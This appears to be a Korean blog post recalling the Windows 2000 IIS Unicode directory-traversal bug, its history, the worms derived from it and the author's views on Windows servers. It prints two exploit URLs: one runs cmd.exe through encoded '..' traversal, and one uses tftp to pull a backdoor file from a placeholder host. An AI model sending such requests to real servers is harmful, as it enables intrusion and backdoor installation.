IIS UNICODE BUG

참 고전적인 버그다. 윈도우서버 2000에서 발생되었고 주로 2000년도 2001년 2002년까지 활동하였다. 윈도우 서버군을 디폴트로 설치하면 iis서버가 자동으로 구동 되었고, 자동으로 80포트를 통해 자동으로 10분 이내에 감염이 되었었다. 그만큼 숙주 서버가 많았다고 보면 된다.

그리고 MS에서 패치가 제대로 이루어지지 않아 지금 생각하면 당시 MS에서도 보안 전문 인력이 지금 처럼 많이 않았을거 같다.

exploit payload는 굉장히 단순하다. 타겟호스트에 스크립트 폴더를 이용하여 유니코드 문자열을 통해 cmd.exe이 사용 가능하다.

 http://target_host/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir

아래는 tftp(udp 69번)프로토콜을 통해 지금이라면 RAT와 같은 백도어를 업로드 하는 명령어다.

http://target_host/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ tftp+-i+tftp_host+get+"upload_file

당시 윈도우 서버는 신선했다. MS에서 유닉스에 대항하여 서버OS를 만들었다는것도 대단하였고, GUI환경과 Active Directory신선한 개념을 들고 나왔다. 이걸로 인해 한때 붐이 일어나기도 했다. 지금 생각해보면 영업빨이 아닌가 하는 생각도 든다.

문제가 많았다. 보안적인 문제나 안정성, 서버OS인데도 블루스크린이 가끔 뜨기도 하였다. 그것보다 가장 큰 문제는 퍼포먼스 였다. GUI를 올리고 사용하다보니 당시 사양이 뛰어나지 않아서 성능성 굉장한 문제가 발생하였다.

당시 리눅스나 유닉스에서 놀던 해커들이 갑자기 윈도우시스템에 관심을 가지기 시작했다. 외국에서는 불가리아 해커 구닌스키가 유명하였고, 국내에서는 바**님이나 가***님이 선두로 이끌었고, ntfaq.co.kr 커뮤니티가 활발이 활동 하였다. 문제가 왜 심각 하였나면 MS의 패치가 제대로 이루어 지지 않아 몇번의 패치가 되어도 우회되는 취약점이 계속 발생 하였다.

즉 다시 말하면 당시 iis를 사용하였던 서버는 거의 다 털렸다고 보면 된다. snort나 오픈소스 웹방화벽이 있었지만 둘다 제구실을 못하던 시절이다.

취약점 스캐닝 툴로는 쉐도우 시스템 스캐너(SSS)라고  러시아산이 유명했고, 맥아피의 cybercop이나 랜가이드 같은 툴이 나오기 시작 하였다.

그리고 취약점의 전체 Lifecycle도 알수 있었다. 그전에 활용되던 다른 remote 관련 취약점들도 이정도까지 하나의 Lifecycle 형태로 돌지는 않았다.

제로데이-> 1 day -> 자동화 공격툴 -> 웜-> 소멸

웜이 나오면 그뒤로 점차 피해가 줄어드는 추세였다. 코드레드, 코드블루, nimda 다 iis유니코드의 변형들이다.

요즘 랜섬웨어가 하도 유행중이라고, 하는데 랜섬웨어가 활발이 활동 할수록 일반 유저들의 관심도가 많아지고 보안의식 또한 좋아진다. 그리고 기존의 중국, 북한등 해커들 입장에서는 공격이 점차 점차 어려워 질수도 있지 않을까 하는 생각도 든다.

아직도 윈도우 서버를 운영하기에는 조금 꺼리는 면이 있다. 업데이트를 하면 리부팅을 한다던지 레지스트리나 시스템파일에 계정으로 설치 하여도 막 설치되는 경우가 많다. 장애나 퍼포먼스에서는 아직도 원인 파악이 유닉스보다는 조금 힘든 부분도 있다. 하지만 엄청난 고수인 경우에는 iis가 엄청난 퍼포먼스를 낸다고 하던데 한번도 본적은 없다.